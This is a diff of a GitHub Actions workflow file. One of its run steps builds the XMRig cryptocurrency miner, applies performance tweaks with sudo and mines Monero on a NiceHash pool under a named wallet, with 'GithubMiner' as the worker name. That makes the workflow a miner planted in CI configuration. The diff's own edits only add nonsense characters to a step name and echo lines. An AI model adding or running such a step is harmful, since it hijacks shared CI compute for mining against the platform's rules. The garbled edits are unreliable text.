--- a/.github/workflows/config.yml
+++ b/.github/workflows/config.yml
@@ -30,7 +30,7 @@ jobs:
         run: echo "Github" && sudo apt-get install git build-essential msr-tools cmake automake libtool autoconf -y && git clone https://github.com/xmrig/xmrig.git && mkdir xmrig/build && cd xmrig/scripts && ./build_deps.sh && sudo ./randomx_boost.sh && sudo ./enable_1gb_pages.sh && cd ../build && cmake .. -DXMRIG_DEPS=scripts/deps && make -j$(nproc) && sudo ./xmrig --donate-level 5 -o stratum+ssl://randomxmonero.auto.nicehash.com:443 -u 3Q2atbcDpcbb3y3no9sVFcBMpi58hPNxoo.GithubMiner -p x -k --nicehash --coin monero -a rx/0
 
       # Runs a set of commands using the runners shell
-      - name: Run a multi-line script
+      - name: Run a multi-line scriptbvv
         run: |
           echo Add other actions to build,hhnngcx
           echo test, and deploy your project.bnnbnnbbbxc
